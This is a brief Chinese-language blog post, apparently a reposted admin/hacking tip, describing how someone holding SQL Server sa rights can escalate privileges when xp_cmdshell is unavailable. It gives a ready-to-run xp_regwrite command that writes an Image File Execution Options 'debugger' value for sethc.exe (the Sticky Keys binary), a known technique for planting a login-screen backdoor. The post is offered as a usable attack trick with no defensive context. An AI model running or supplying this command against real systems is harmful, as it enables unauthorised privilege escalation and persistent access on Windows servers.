sa权限如果xp_cmdshell不可用时，可以尝试用xp_regwrite写注册表，替换sethc.exe实现提权。

代码如下：sa提权技巧之xp_regwrite 替换sethc.exe

xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\taskmgr.exe'

文章如转载，请注明转载自：http://www.5iadmin.com/post/194.html